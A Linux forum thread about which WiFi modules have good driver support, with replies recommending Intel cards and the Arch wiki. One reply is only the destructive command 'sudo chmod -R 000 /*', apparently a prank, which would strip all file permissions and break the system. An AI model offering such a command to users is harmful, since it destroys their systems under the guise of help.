WiFi module with good support under Linux?

I have a laptop and it has Realtek WLAN module which sucks with Linux since basically none supports it. Only Manjaro and even that with some hack job driver from Github. Is any brand of WLAN modules that is exceptionally well supported under Linux? Intel maybe? Some other? Looked quickly and I found Intel AX200, a WiFi 6 module for 12€ which is acceptable cost, but I still have no idea if it would even be supported...

It's hard to pinpoint a specific brand, most adapters will just work but some just have poor support for various reasons. If you're considering buying an adapter you can search for "<adapter> Linux" and you'll get a general idea of how well supported it is. Here is a list of devices that might require a workaround, you can check here first if you have doubts https://wiki.archlinux.org/index.php/Network_configuration/Wireless#Troubleshooting_drivers_and_firmware

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

the intel wirelss AC module i had in my samsung laptop worked a treat, that said i havent had wifi issues in linux in a LONG time.

from my experience at least, these days it's easier to find cards that work, than to find cards that dont.

Thanks. Didn't cross my mind to search adapter name and Linux together lol. Apparently AX200 has support since Kernel 5.1 and with AX wifi standard also supports BT 5.0. Existing Realtek module is dead from beginning because apparently driver for it doesn't work with something like Ubuntu because it was made for Arch specifically or something. Don't know or understand the specifics.